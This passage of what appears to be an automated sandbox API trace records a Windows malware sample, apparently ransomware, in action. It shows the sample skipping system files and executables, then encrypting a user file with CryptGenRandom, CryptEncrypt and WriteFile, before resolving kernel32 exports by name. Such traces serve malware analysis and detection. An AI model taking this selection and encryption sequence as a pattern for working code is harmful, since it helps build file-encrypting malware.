(lpString1="NbYe.swf", lpString2="bootsect.bak") returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="ntuser.dat.log") returned -1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="thumbs.db") returned -1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="Bootfont.bin") returned 1 [0087.442] lstrlenW (lpString="NbYe.swf") returned 8 [0087.442] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.442] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.442] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.442] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.442] lstrlenW (lpString="NbYe.swf") returned 8 [0087.442] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="NbYe.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf" [0087.442] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\NbYe.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\nbye.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.443] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=57052) returned 1 [0087.443] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.443] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.443] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.443] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.443] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.443] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.443] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.444] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.445] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.445] CloseHandle (hObject=0x42c) returned 1 [0087.445] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.445] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.446] CloseHandle (hObject=0x0) returned 0 [0087.446] CloseHandle (hObject=0x428) returned 1 [0087.446] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.446] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.447] GetTickCount () returned 0x114e4e3 [0087.447] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.447] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.447] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.447] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.447] lstrlenA (lpString="kernel32.dll") returned 12 [0087.448] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.448] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.448] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.448] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.448] lstrlenA (lpString="ADDATOMA") returned 8 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.448] lstrlenA (lpString="ADDATOMW") returned 8 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.448] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.448] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.448] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.448] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.448] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.448] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.448] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.448] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.448] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.448] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.448] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.449] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.449] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.449] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.449] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.449] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.449] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.449] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.449] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.449] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.449] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.449] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.449] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.449] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.449] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.449] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.449] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.449] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.449] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.449] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.450] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.450] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.450] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.450] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.450] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.450] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.450] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.450] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.450] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.450] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.450] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.450] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.451] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.451] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.451] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.451] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.451] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.451] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.451] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.451] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.451] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.451] lstrlenA (lpString="BEEP") returned 4 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.451] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.451] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.451] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.451] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.451] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.451] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.451] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.451] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.452] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.452] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.452] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.452] lstrlenA (lpString="CANCELIO") returned 8 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.452] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.452] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.452] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.452] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.452] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.452] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.452] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.452] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.452] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.452] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.452] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.452] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.452] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.452] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.453] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.453] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.453] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.453] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.453] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.453] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.453] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.453] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.453] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.453] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.453] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.453] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.453] lstrlenA 